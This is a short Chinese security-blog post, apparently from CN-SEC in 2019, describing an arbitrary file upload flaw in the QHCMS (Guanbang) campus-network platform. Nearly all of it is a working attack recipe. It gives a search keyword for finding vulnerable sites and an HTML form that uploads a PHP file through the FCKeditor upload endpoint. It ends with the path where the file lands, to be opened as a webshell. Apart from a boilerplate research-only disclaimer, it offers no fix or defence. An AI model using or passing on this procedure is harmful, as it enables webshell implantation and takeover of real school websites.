QHCMS任意文件上传漏洞

颓废 2019年5月19日10:44:26评论817 views字数 353阅读1分10秒阅读模式
摘要

2. 将以下代码保存为.html,手动POST一个.php文件:

1. 以“qhcmsadmin”为关键字,搜索使用冠邦校园网平台的网站。

2. 将以下代码保存为.html,手动POST一个.php文件:

<form enctype="multipart/form-data" action="http://www.xxx.com/editor/fckeditor/filemanager/upload/php/upload.php" method="post">   <input name="FCKeditor_File" type="file">   <input type="submit" value="Upload">  </form>

3. 上传成功则保存在http://www.xxx.com/images/stories/editorupload/下,使用原始文件名访问即可拿到Webshell。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日10:44:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   QHCMS任意文件上传漏洞https://cn-sec.com/archives/67420.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息